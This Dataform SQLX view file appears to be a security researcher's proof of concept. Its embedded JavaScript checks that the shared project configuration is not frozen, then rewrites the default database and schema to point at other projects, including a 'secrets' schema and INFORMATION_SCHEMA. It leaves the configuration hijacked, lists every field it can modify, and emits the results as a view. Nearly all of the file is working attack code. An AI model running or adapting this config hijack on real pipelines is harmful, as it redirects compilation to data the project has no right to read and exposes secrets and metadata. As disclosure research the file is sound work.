config { type: "view", name: "config_hijack" }

js {
  let r = { t: new Date().toISOString() };

  // Record original config
  r.original = {
    defaultDatabase: dataform.projectConfig.defaultDatabase,
    defaultSchema: dataform.projectConfig.defaultSchema,
    frozen: Object.isFrozen(dataform.projectConfig),
    sealed: Object.isSealed(dataform.projectConfig)
  };

  // VULNERABILITY: Config is not frozen - we can modify it
  // This affects ALL subsequent actions in the compilation

  // Try different hijack targets
  const hijackAttempts = [
    // Target 1: Public data (read-only, should work)
    { db: "bigquery-public-data", schema: "austin_311" },
    // Target 2: Another project in same org
    { db: "shir-research-2", schema: "secrets" },
    // Target 3: INFORMATION_SCHEMA access
    { db: "shir-research-3", schema: "INFORMATION_SCHEMA" }
  ];

  r.hijackAttempts = [];

  for (const target of hijackAttempts) {
    try {
      dataform.projectConfig.defaultDatabase = target.db;
      dataform.projectConfig.defaultSchema = target.schema;

      r.hijackAttempts.push({
        target: target,
        success: true,
        newDb: dataform.projectConfig.defaultDatabase,
        newSchema: dataform.projectConfig.defaultSchema
      });
    } catch(e) {
      r.hijackAttempts.push({
        target: target,
        success: false,
        error: e.message
      });
    }
  }

  // Final state - leave it pointing to INFORMATION_SCHEMA
  r.finalConfig = {
    defaultDatabase: dataform.projectConfig.defaultDatabase,
    defaultSchema: dataform.projectConfig.defaultSchema
  };

  // What else can we modify?
  r.modifiableFields = [];
  for (const key of Object.keys(dataform.projectConfig)) {
    const orig = dataform.projectConfig[key];
    try {
      dataform.projectConfig[key] = "MODIFIED";
      if (dataform.projectConfig[key] === "MODIFIED") {
        r.modifiableFields.push(key);
      }
      dataform.projectConfig[key] = orig;
    } catch(e) {}
  }
}

SELECT '${JSON.stringify(r)}' as config_hijack
